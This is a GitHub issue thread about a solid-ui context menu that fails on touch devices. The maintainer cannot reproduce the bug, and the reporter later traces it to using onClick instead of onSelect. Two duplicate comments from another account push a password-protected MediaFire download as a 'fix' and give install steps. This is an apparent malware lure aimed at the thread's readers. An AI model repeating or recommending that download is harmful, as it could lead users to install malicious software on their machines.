### ISSUE TITLE
[Bug] Context Menu doesn't work on touch devices.

### ISSUE THREAD

**Issue by vanillacode314** [sek-consulting/solid-ui#132]
repro: https://stackblitz.com/edit/github-ajatgp?file=src%2Froutes%2Findex.tsx

steps: 
1. open on mobile or desktop touch emulation
2. long press area to open menu
3. try to click the item and nothing happens

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by sek-consulting** [comment]
I tested it with the following setups and it worked:
- Windows & Chrome (Touch Emulation)
- Android & Firefox
- Android & Chrome

So I unfortunatelly can't reproduce the issue.
Did you try the official docs on mobile? Cause those work flawless too an the setups above.
https://www.solid-ui.com/docs/components/context-menu

**Comment by vanillacode314** [comment]
Hmm, it seems to be working inconsistently, might be a touch target issue. closing this anyways. Thanks for looking into this :)

**Comment by vanillacode314** [comment]
anyone looking at this in the future. The issue was happening because I was using `onClick` instead of `onSelect` on the `DropdownItem`
